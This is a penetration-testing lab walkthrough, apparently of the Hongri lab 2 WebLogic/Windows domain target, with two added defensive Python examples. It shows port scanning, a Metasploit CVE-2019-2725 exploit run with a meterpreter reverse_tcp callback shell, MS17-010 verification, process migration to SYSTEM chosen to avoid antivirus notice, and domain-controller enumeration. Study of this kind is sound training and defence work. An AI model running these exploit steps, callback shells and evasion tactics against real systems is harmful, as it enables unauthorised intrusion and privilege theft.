I. Lab information
Notes:
II. Information gathering
1. TCP port scan + service fingerprinting + OS detection
Tools: rustscan + nmap
nmap is given the -Pn flag, which skips host discovery. This avoids the service fingerprinting failing just because host discovery failed.
It matters because nmap's default scan logic is:
    Host discovery (ICMP ping / TCP ping)
        ↓
    No response?
        ↓
    Host considered down → skipped entirely, no port scan
The problem is that many hosts (Windows machines and servers behind a firewall in particular) block ICMP while their services are running normally. Nmap wrongly concludes the host is down and you scan nothing.
Command:
    sudo rustscan -a 192.168.111.80 -r 1-65535 -- -sV -O -Pn -n
Output (only the relevant part, since the full output is long):
    PORT      STATE SERVICE        REASON          VERSION
    80/tcp    open  http           syn-ack ttl 63  Microsoft IIS httpd 7.5
    135/tcp   open  msrpc          syn-ack ttl 63  Microsoft Windows RPC
    139/tcp   open  netbios-ssn    syn-ack ttl 63  Microsoft Windows netbios-ssn
    445/tcp   open  microsoft-ds   syn-ack ttl 63  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
    1433/tcp  open  ms-sql-s       syn-ack ttl 63  Microsoft SQL Server 2008 R2 10.50.4000; SP2
    3389/tcp  open  ms-wbt-server? syn-ack ttl 63
    7001/tcp  open  http           syn-ack ttl 63  Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
    49152/tcp open  msrpc          syn-ack ttl 63  Microsoft Windows RPC
    49153/tcp open  msrpc          syn-ack ttl 63  Microsoft Windows RPC
    49154/tcp open  msrpc          syn-ack ttl 63  Microsoft Windows RPC
    49176/tcp open  msrpc          syn-ack ttl 63  Microsoft Windows RPC
    49194/tcp open  msrpc          syn-ack ttl 63  Microsoft Windows RPC
    60966/tcp open  ms-sql-s       syn-ack ttl 63  Microsoft SQL Server 2008 R2 10.50.4000; SP2
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running (JUST GUESSING): Microsoft Windows 2008|7|8.1 (94%)
    OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1
    OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
    Aggressive OS guesses: Microsoft Windows Server 2008 R2 or Windows 7 SP1 (94%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 SP1 (88%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 or Windows 8.1 (87%)
    No exact OS matches for host (test conditions non-ideal).
    TCP/IP fingerprint:
    SCAN(V=7.98%E=4%D=3/31%OT=80%CT=%CU=%PV=Y%G=N%TM=69CB43AF%P=x86_64-pc-linux-gnu)
    SEQ(SP=106%GCD=1%ISR=109%TI=I%TS=7)
    SEQ(SP=109%GCD=1%ISR=108%TI=I%TS=7)
    OPS(O1=M551NW8ST11%O2=M551NW8ST11%O3=M551NW8NNT11%O4=M551NW8ST11%O5=M551NW8ST11%O6=M551ST11)
    WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)
    ECN(R=Y%DF=Y%TG=40%W=2000%O=M551NW8NNS%CC=N%Q=)
    T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
    T2(R=N)
    T3(R=N)
    T4(R=N)
    U1(R=N)
    IE(R=N)

    Uptime guess: 0.016 days (since Tue Mar 31 11:23:47 2026)
    TCP Sequence Prediction: Difficulty=265 (Good luck!)
    IP ID Sequence Generation: Incremental
    Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

    Read data files from: /usr/share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 2 IP addresses (2 hosts up) scanned in 181.06 seconds
               Raw packets sent: 198 (18.984KB) | Rcvd: 60 (3.064KB)
2. UDP scan of the key ports + fingerprinting
Run a round of UDP scanning as well, so that nothing important is missed:
Tool: Nmap
Command:
    sudo nmap -sU --top-ports 20 -sV -Pn -n 192.168.111.80
Output:
    Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 11:51 +0800
    Nmap scan report for 192.168.111.80
    Host is up.

    PORT      STATE         SERVICE       VERSION
    53/udp    open|filtered domain
    67/udp    open|filtered dhcps
    68/udp    open|filtered dhcpc
    69/udp    open|filtered tftp
    123/udp   open|filtered ntp
    135/udp   open|filtered msrpc
    137/udp   open|filtered netbios-ns
    138/udp   open|filtered netbios-dgm
    139/udp   open|filtered netbios-ssn
    161/udp   open|filtered snmp
    162/udp   open|filtered snmptrap
    445/udp   open|filtered microsoft-ds
    500/udp   open|filtered isakmp
    514/udp   open|filtered syslog
    520/udp   open|filtered route
    631/udp   open|filtered ipp
    1434/udp  open|filtered ms-sql-m
    1900/udp  open|filtered upnp
    4500/udp  open|filtered nat-t-ike
    49152/udp open|filtered unknown

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 128.47 seconds
Every port came back open|filtered (no reply either way), so this round adds no usable information; the TCP results are what we work from.
3. Priority list
Target: very likely a Windows Server 2008 R2
Architecture: almost certainly x64
Ports of interest:
    PORT      STATE SERVICE        REASON          VERSION
    7001/tcp  open  http           syn-ack ttl 63  Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
T3 is WebLogic's remote object protocol. It is enabled by default and has a history of repeated deserialization vulnerabilities.
    PORT      STATE SERVICE        REASON          VERSION
    445/tcp   open  microsoft-ds   syn-ack ttl 63  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
MS17-010 (EternalBlue) is present on 2008 R2 by default until the patch is applied.
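As an added example that is not part of the original write-up, here is a small Python parser and triage routine for nmap's normal output, so that the manual priority-list step above can be applied to any scan of your own hosts. The sample scan text is constructed from the port lines shown above; the two high-priority rules (WebLogic with T3 enabled, SMB on a 2008 R2-era host) follow the write-up's own reasoning, while the severity labels, the medium rules and all function names are this example's own assumptions.

```python
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple

# Constructed sample: the open-port lines of the rustscan/nmap run above, laid out
# in nmap's normal output format (PORT STATE SERVICE REASON VERSION).
SAMPLE_SCAN = """\
PORT      STATE SERVICE        REASON          VERSION
80/tcp    open  http           syn-ack ttl 63  Microsoft IIS httpd 7.5
135/tcp   open  msrpc          syn-ack ttl 63  Microsoft Windows RPC
445/tcp   open  microsoft-ds   syn-ack ttl 63  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp  open  ms-sql-s       syn-ack ttl 63  Microsoft SQL Server 2008 R2 10.50.4000; SP2
3389/tcp  open  ms-wbt-server? syn-ack ttl 63
7001/tcp  open  http           syn-ack ttl 63  Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
"""


@dataclass
class ScannedService:
    port: int
    proto: str
    state: str
    service: str
    version: str


# One port line: "<port>/<proto> <state> <service> <reason> [<version>]".
# With --reason the reason column looks like "syn-ack ttl 63", so it may contain spaces.
LINE_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s+"
    r"(?P<reason>\S+(?: ttl \d+)?)\s*(?P<version>.*)$"
)


def parse_scan(text: str) -> List[ScannedService]:
    """Turn nmap normal output into structured records; header and noise lines are skipped."""
    services = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        services.append(ScannedService(
            port=int(m["port"]), proto=m["proto"], state=m["state"],
            service=m["service"], version=m["version"].strip(),
        ))
    return services


# Exposure rules drawn from the write-up's priority list. Severity labels are this example's.
Rule = Tuple[Callable[[ScannedService], bool], str, str]
TRIAGE_RULES: List[Rule] = [
    (lambda s: "WebLogic" in s.version and "T3 enabled" in s.version, "high",
     "WebLogic with T3 enabled; 10.3.6.0 is listed as affected by CVE-2019-2725"),
    (lambda s: s.service == "microsoft-ds", "high",
     "SMB exposed on a 2008 R2-era host; confirm the MS17-010 patch is installed"),
    (lambda s: s.service == "ms-sql-s", "medium", "SQL Server reachable directly"),
    (lambda s: s.service.rstrip("?") == "ms-wbt-server", "medium", "RDP reachable directly"),
]
SEVERITY_ORDER = {"high": 0, "medium": 1}


def triage(services: List[ScannedService]) -> List[Tuple[int, str, str]]:
    """Return (port, severity, reason) for every open service a rule matches, highest first."""
    findings = []
    for svc in services:
        if svc.state != "open":
            continue
        for predicate, severity, why in TRIAGE_RULES:
            if predicate(svc):
                findings.append((svc.port, severity, why))
    findings.sort(key=lambda f: (SEVERITY_ORDER[f[1]], f[0]))
    return findings


if __name__ == "__main__":
    for port, sev, why in triage(parse_scan(SAMPLE_SCAN)):
        print(f"{sev:6} {port:>5}  {why}")
```

Run against the sample, the two high findings are ports 445 and 7001, which is exactly the pair the write-up singles out; the parser is deliberately tolerant of the trailing "?" nmap appends to unconfirmed service names such as ms-wbt-server?.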
III. Vulnerability discovery and verification
1. CVE-2019-2725
Search for vulnerabilities matching the fingerprint:
Note that tighter keywords are not always better; sometimes loosening the keywords shows you much richer results.
Look up the CVE number:
    zyf@kali:~$ searchsploit -x 46780 | head -10
      Exploit: Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution
          URL: https://www.exploit-db.com/exploits/46780
         Path: /usr/share/exploitdb/exploits/windows/webapps/46780.py
        Codes: CVE-2019-2725
     Verified: False
    File Type: Python script, ASCII text executable, with very long lines (6251)
It is CVE-2019-2725. Open MSF and find the matching module with the search command:
    msf > search CVE-2019-2725

    Matching Modules
    ================

       #  Name                                                          Disclosure Date  Rank       Check  Description
       -  ----                                                          ---------------  ----       -----  -----------
       0  exploit/multi/misc/weblogic_deserialize_asyncresponseservice  2019-04-23       excellent  Yes    Oracle Weblogic Server Deserialization RCE - AsyncResponseService
       1    \_ target: Unix                                             .                .          .      .
       2    \_ target: Windows                                          .                .          .      .
       3    \_ target: Solaris                                          .                .          .      .

    Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
    After interacting with a module you can manually set a TARGET with set TARGET 'Solaris'
Use the module and verify:
    msf > use 0
    [*] Using configured payload cmd/unix/reverse_bash
    msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > info

           Name: Oracle Weblogic Server Deserialization RCE - AsyncResponseService
         Module: exploit/multi/misc/weblogic_deserialize_asyncresponseservice
       Platform: Unix, Windows, Solaris
           Arch: cmd, x64, x86
     Privileged: No
        License: Metasploit Framework License (BSD)
           Rank: Excellent
      Disclosed: 2019-04-23

    Provided by:
      Andres Rodriguez - 2Secure (@acamro) <acamro@gmail.com>

    Module side effects:
      ioc-in-logs

    Module stability:
      crash-safe

    Module reliability:
      repeatable-session

    Available targets:
          Id  Name
          --  ----
      =>  0   Unix
          1   Windows
          2   Solaris

    Check supported:
      Yes

    Basic options:
      Name       Current Setting               Required  Description
      ----       ---------------               --------  -----------
      Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, http, socks5h, sapni, socks4
      RHOSTS                                   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
      RPORT      7001                          yes       The target port (TCP)
      SSL        false                         no        Negotiate SSL/TLS for outgoing connections
      TARGETURI  /_async/AsyncResponseService  yes       URL to AsyncResponseService
      VHOST                                    no        HTTP server virtual host

    Payload information:

    Description:
      An unauthenticated attacker with network access to the Oracle Weblogic
      Server T3 interface can send a malicious SOAP request to the interface
      WLS AsyncResponseService to execute code on the vulnerable host.

    References:
      https://nvd.nist.gov/vuln/detail/CVE-2019-2725
      http://web.archive.org/web/20190508024326/http://www.cnvd.org.cn/webinfo/show/4999
      https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html
      https://twitter.com/F5Labs/status/1120822404568244224

    View the full module info with the info -d command.

    msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set target Windows
    target => Windows
    msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set LHOST 192.168.111.44
    LHOST => 192.168.111.44
    msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set RHOST 192.168.111.80
    RHOST => 192.168.111.80
    msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > check
    [+] 192.168.111.80:7001 - The target is vulnerable.
The vulnerability is present.
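The module info above lists ioc-in-logs as a side effect, and its TARGETURI is /_async/AsyncResponseService. As an added example that is not part of the original write-up, the Python below shows what a defender can do with that: scan a WebLogic HTTP access log for requests into the /_async/ tree and count them per client address, which is the quickest way to tell whether this endpoint was ever touched from outside. The log lines are constructed for this example in common log format (the layout WebLogic's access.log uses by default); the client addresses, timestamps and status codes are made up, and the function names are this example's own.

```python
import re
from collections import Counter
from typing import Dict, List, Optional

# Constructed sample access-log lines. 192.168.111.44 plays the scanning host from the
# write-up, 10.10.10.20 an ordinary internal client; nothing here is real captured traffic.
SAMPLE_ACCESS_LOG = [
    '10.10.10.20 - - [31/Mar/2026:15:10:02 +0800] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 4121',
    '10.10.10.20 - - [31/Mar/2026:15:10:09 +0800] "POST /console/j_security_check HTTP/1.1" 302 0',
    '192.168.111.44 - - [31/Mar/2026:15:17:58 +0800] "POST /_async/AsyncResponseService HTTP/1.1" 202 0',
    '192.168.111.44 - - [31/Mar/2026:15:18:11 +0800] "POST /_async/AsyncResponseService HTTP/1.1" 202 0',
    '10.10.10.20 - - [31/Mar/2026:15:20:40 +0800] "GET /favicon.ico HTTP/1.1" 404 1164',
]

# Common log format: ip ident user [timestamp] "METHOD path protocol" status size
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# The module's TARGETURI lives under /_async/. On a server that has no legitimate
# consumer of the async SOAP endpoint, any request into that tree deserves an alert.
WATCHED_PREFIXES = ("/_async/",)


def parse_clf(line: str) -> Optional[Dict[str, str]]:
    """Parse one access-log line into its fields, or None if it is not in CLF."""
    m = CLF_RE.match(line)
    return m.groupdict() if m else None


def find_watched_requests(lines: List[str]) -> List[Dict[str, str]]:
    """Return the parsed requests whose path starts with one of the watched prefixes."""
    hits = []
    for line in lines:
        rec = parse_clf(line)
        if rec and rec["path"].startswith(WATCHED_PREFIXES):
            hits.append(rec)
    return hits


def hits_by_source(hits: List[Dict[str, str]]) -> Counter:
    """Count matching requests per client address, for quick triage of who probed the endpoint."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    hits = find_watched_requests(SAMPLE_ACCESS_LOG)
    for h in hits:
        print(f'{h["ts"]}  {h["ip"]:15}  {h["method"]} {h["path"]} -> {h["status"]}')
    print(dict(hits_by_source(hits)))
```

Access logs do not carry request bodies, so this cannot confirm exploitation by itself; it tells you which sources sent requests to the endpoint and when, which is the pivot for pulling the matching WebLogic server log and process telemetry. The lasting fix is the vendor patch referenced in the module output.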
2. EternalBlue
Verify with Nmap's NSE script:
    ┌──(zyf㉿kali)-[~/hongr2]
    └─$ sudo nmap --script=smb-vuln-ms17-010 192.168.111.80 -p 445 -Pn -n
    Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 15:02 +0800
    Nmap scan report for 192.168.111.80
    Host is up (0.068s latency).

    PORT    STATE SERVICE
    445/tcp open  microsoft-ds

    Host script results:
    | smb-vuln-ms17-010:
    |   VULNERABLE:
    |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
    |     State: VULNERABLE
    |     IDs:  CVE:CVE-2017-0143
    |     Risk factor: HIGH
    |       A critical remote code execution vulnerability exists in Microsoft SMBv1
    |        servers (ms17-010).
    |
    |     Disclosure date: 2017-03-14
    |     References:
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
    |       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
    |_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

    Nmap done: 1 IP address (1 host up) scanned in 1.99 seconds
The vulnerability is present.
There are two entry points. Since the first lab in this series (红日靶场(一)) already used EternalBlue, CVE-2019-2725 is used here.
IV. Exploitation
Pick the payload, then run:
    msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set payload payload/windows/x64/meterpreter/reverse_tcp
    payload => windows/x64/meterpreter/reverse_tcp
    msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > run
    [-] Handler failed to bind to 192.168.111.44:4444:-  -
    [*] Started reverse TCP handler on 0.0.0.0:4444
    [*] Generating payload...
    [*] Sending payload...
    [*] Sending stage (232006 bytes) to 192.168.111.80
    [*] Meterpreter session 1 opened (10.8.0.6:4444 -> 192.168.111.80:49477) at 2026-03-31 15:18:14 +0800

    meterpreter >
That gives us a Meterpreter shell.
V. Pivot host information gathering
    meterpreter > sysinfo
    Computer        : WEB
    OS              : Windows Server 2008 R2 (6.1 Build 7601, Service Pack 1).
    Architecture    : x64
    System Language : zh_CN
    Domain          : DE1AY
    Logged On Users : 5
    Meterpreter     : x64/windows
The Domain field shows we are inside a domain environment, and the Computer field shows the local hostname is WEB.
    meterpreter > getuid
    Server username: WEB\Administrator
So we hold the local Administrator account on this host.
VI. Process migration and privilege escalation
Get the current PID:
    meterpreter > getpid
    Current pid: 3676
List the processes:
    meterpreter > ps

    Process List
    ============

     PID   PPID  Name                          Arch  Session  User                          Path
     ---   ----  ----                          ----  -------  ----                          ----
     0     0     [System Process]
     4     0     System                        x64   0
     208   496   svchost.exe                   x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
     256   4     smss.exe                      x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
     340   332   csrss.exe                     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
     392   332   wininit.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
     400   384   csrss.exe                     x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
     436   384   winlogon.exe                  x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
     496   392   services.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
     504   392   lsass.exe                     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
     508   496   svchost.exe                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
     512   392   lsm.exe                       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsm.exe
     600   496   svchost.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
     664   496   vmacthlp.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmacthlp.exe
     708   496   svchost.exe                   x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
     780   436   LogonUI.exe                   x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\LogonUI.exe
     788   496   svchost.exe                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
     836   496   svchost.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
     880   496   svchost.exe                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
     924   496   svchost.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
     968   496   ZhuDongFangYu.exe             x86   0        NT AUTHORITY\SYSTEM           C:\Program Files (x86)\360\360Safe\deepscan\zhudongfangyu.exe
     1144  496   spoolsv.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
     1192  496   svchost.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
     1304  836   taskeng.exe                   x64   0        WEB\Administrator             C:\Windows\system32\taskeng.exe
     1316  496   sqlwriter.exe                 x64   0        NT AUTHORITY\SYSTEM           c:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
     1360  1304  cmd.exe                       x64   0        WEB\Administrator             C:\Windows\SYSTEM32\cmd.exe
     1384  340   conhost.exe                   x64   0        WEB\Administrator             C:\Windows\system32\conhost.exe
     1392  496   sqlservr.exe                  x64   0        DE1AY\mssql                   c:\Program Files\Microsoft SQL Server\MSSQL10_50.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
     1500  692   powershell.exe                x86   0        WEB\Administrator             C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
     1528  496   SMSvcHost.exe                 x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
     1548  496   VGAuthService.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
     1700  496   ReportingServicesService.exe  x64   0        DE1AY\mssql                   c:\Program Files\Microsoft SQL Server\MSRS10_50.SQLEXPRESS\Reporting Services\ReportServer\bin\ReportingServicesService.exe
     1896  496   vmtoolsd.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
     1908  1360  java.exe                      x86   0        WEB\Administrator             C:\Oracle\MIDDLE~1\JDK160~1\bin\java.exe
     1956  496   svchost.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
     1968  2528  powershell.exe                x86   0        WEB\Administrator             C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
     2168  340   conhost.exe                   x64   0        WEB\Administrator             C:\Windows\system32\conhost.exe
     2232  3888  powershell.exe                x86   0        WEB\Administrator             C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
     2328  496   sppsvc.exe                    x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\sppsvc.exe
     2348  4004  powershell.exe                x86   0        WEB\Administrator             C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
     2432  496   fdlauncher.exe                x64   0        NT AUTHORITY\LOCAL SERVICE    c:\Program Files\Microsoft SQL Server\MSSQL10_50.SQLEXPRESS\MSSQL\Binn\fdlauncher.exe
     2496  496   svchost.exe                   x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
     2520  600   WmiPrvSE.exe                  x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\wbem\wmiprvse.exe
     2528  1908  cmd.exe                       x86   0        WEB\Administrator             C:\Windows\SysWOW64\cmd.exe
     2560  496   svchost.exe                   x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
     2620  340   conhost.exe                   x64   0        WEB\Administrator             C:\Windows\system32\conhost.exe
     2668  496   dllhost.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\dllhost.exe
     2784  340   conhost.exe                   x64   0        WEB\Administrator             C:\Windows\system32\conhost.exe
     2796  2432  fdhost.exe                    x64   0        NT AUTHORITY\LOCAL SERVICE    c:\Program Files\Microsoft SQL Server\MSSQL10_50.SQLEXPRESS\MSSQL\Binn\fdhost.exe
     2804  340   conhost.exe                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\conhost.exe
     2820  496   msdtc.exe                     x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\msdtc.exe
     2972  968   360Tray.exe                   x86   0        NT AUTHORITY\SYSTEM           C:\Program Files (x86)\360\360Safe\safemon\360Tray.exe
     2996  340   conhost.exe                   x64   0        WEB\Administrator             C:\Windows\system32\conhost.exe
     3088  3604  powershell.exe                x86   0        WEB\Administrator             C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
     3112  340   conhost.exe                   x64   0        WEB\Administrator             C:\Windows\system32\conhost.exe
     3280  1908  cmd.exe                       x86   0        WEB\Administrator             C:\Windows\SysWOW64\cmd.exe
     3344  1968  powershell.exe                x86   0        WEB\Administrator             C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
     3484  340   conhost.exe                   x64   0        WEB\Administrator             C:\Windows\system32\conhost.exe
     3604  1908  cmd.exe                       x86   0        WEB\Administrator             C:\Windows\SysWOW64\cmd.exe
     3676  2348  powershell.exe                x64   0        WEB\Administrator             C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
     3724  340   conhost.exe                   x64   0        WEB\Administrator             C:\Windows\system32\conhost.exe
     3868  340   conhost.exe                   x64   0        WEB\Administrator             C:\Windows\system32\conhost.exe
     3888  3280  powershell.exe                x86   0        WEB\Administrator             C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
     4004  1908  cmd.exe                       x86   0        WEB\Administrator             C:\Windows\SysWOW64\cmd.exe
Migration target: spoolsv.exe
First, be clear about what makes a good migration target.
It has to satisfy three conditions:
    Condition                 Reason
    SYSTEM privileges         No loss of privilege; keep Administrator or higher
    x64 architecture          Must match the architecture of the current Meterpreter
    Long-running and stable   A system service process that user activity will not close
Looking at the ps list, the processes that meet all three are:
    PID 1144  spoolsv.exe   x64  NT AUTHORITY\SYSTEM  ← print spooler service, always resident
    PID 600   svchost.exe   x64  NT AUTHORITY\SYSTEM  ← system service host
    PID 1896  vmtoolsd.exe  x64  NT AUTHORITY\SYSTEM  ← VMware Tools, bound to be resident in a lab VM
svchost.exe has to be ruled out: it hosts a large number of system services at once, and a migrate (Meterpreter's process-migration command) into it that goes wrong can leave the system unstable.
vmtoolsd.exe is not an option either. It exists to mediate between the hypervisor host and the VM and its lifecycle is controlled by the host, so if the lab VM restarts or misbehaves, the process may simply go away.
While reading the process list you can also see that 360 is running on this machine, and the process we currently live in (powershell.exe) is exactly the kind of process 360 watches most closely, so we had better migrate away quickly.
Command:
    meterpreter > migrate 1144
Output:
    [*] Migrating from 3676 to 1144...
    [*] Migration completed successfully.
Verify:
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    meterpreter > getpid
    Current pid: 1144
Not only did the migration succeed, it also gave us SYSTEM along the way.
VII. Lateral movement
I have seen many write-ups in which the authors simply switch off 360 and the firewall on the target. In my view that is a very noisy action that is rarely taken in a real engagement, and when it is, only a minimal change is made.
1. Domain controllers
List all domain controllers (DCs) of the DE1AY domain:
Here:
Output:
    C:\Windows\system32>nltest /dclist:DE1AY
    nltest /dclist:DE1AY
    Get list of DCs in domain 'DE1AY' from '\\DC'.
        DC.de1ay.com [PDC]  [DS] Site: Default-First-Site-Name
    The command completed successfully
The DC's hostname is DC.
Why not use MSF's post-exploitation modules here?
Because 360 is present, and the signatures of MSF post modules are far more conspicuous than native shell commands.
Show the configuration of every network interface:
    C:\Windows\system32>ipconfig /all
    Windows IP Configuration

       Host Name . . . . . . . . . . . . : WEB
       Primary Dns Suffix  . . . . . . . : de1ay.com
       Node Type . . . . . . . . . . . . : Hybrid
       IP Routing Enabled. . . . . . . . : No
       WINS Proxy Enabled. . . . . . . . : No
       DNS Suffix Search List. . . . . . : de1ay.com

    Ethernet adapter 本地连接 2:

       Connection-specific DNS Suffix  . :
       Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
       Physical Address. . . . . . . . . : 00-50-56-B1-3E-D4
       DHCP Enabled. . . . . . . . . . . : No
       Autoconfiguration Enabled . . . . : Yes
       Link-local IPv6 Address . . . . . : fe80::44ac:f4d2:de86:5630%13(Preferred)
       IPv4 Address. . . . . . . . . . . : 10.10.10.80(Preferred)
       Subnet Mask . . . . . . . . . . . : 255.255.255.0
       Default Gateway . . . . . . . . . : 10.10.10.1
       DHCPv6 IAID . . . . . . . . . . . : 301993001
       DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-06-97-6A-00-0C-29-68-D3-5F
       DNS Servers . . . . . . . . . . . : 10.10.10.10
       NetBIOS over Tcpip. . . . . . . . : Enabled

    Ethernet adapter 本地连接:

       Connection-specific DNS Suffix  . :
       Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
       Physical Address. . . . . . . . . : 00-50-56-B1-48-8C
       DHCP Enabled. . . . . . . . . . . : No
       Autoconfiguration Enabled . . . . : Yes
       Link-local IPv6 Address . . . . . : fe80::bc90:5eb2:f5fa:68c7%11(Preferred)
       IPv4 Address. . . . . . . . . . . : 192.168.111.80(Preferred)
       Subnet Mask . . . . . . . . . . . : 255.255.255.0
       Default Gateway . . . . . . . . . : 192.168.111.1
       DHCPv6 IAID . . . . . . . . . . . : 234884137
       DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-06-97-6A-00-0C-29-68-D3-5F
       DNS Servers . . . . . . . . . . . : 10.10.10.10
       NetBIOS over Tcpip. . . . . . . . : Enabled

    Tunnel adapter isatap.{AD80CD23-D97F-4814-A715-9248D845EA0F}:

       Media State . . . . . . . . . . . : Media disconnected
       Connection-specific DNS Suffix  . :
       Description . . . . . . . . . . . : Microsoft ISATAP Adapter
       Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
       DHCP Enabled. . . . . . . . . . . : No
       Autoconfiguration Enabled . . . . : Yes

    Tunnel adapter isatap.{D7E14072-49B9-45D3-BA8C-7955E6146CC2}:

       Media State . . . . . . . . . . . : Media disconnected
       Connection-specific DNS Suffix  . :
       Description . . . . . . . . . . . : Microsoft ISATAP Adapter
       Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
       DHCP Enabled. . . . . . . . . . . : No
       Autoconfiguration Enabled . . . . : Yes
This shows the host is dual-homed:
    External: 192.168.111.80
    Internal: 10.10.10.80
And one more key piece of information: the DC's IP is probably 10.10.10.10, the address both adapters use as their DNS server.
Verify:
    C:\Windows\system32>nslookup DC.de1ay.com
    nslookup DC.de1ay.com
    DNS request timed out.
        timeout was 2 seconds.
    服务器:  UnKnown
    Address:  10.10.10.10
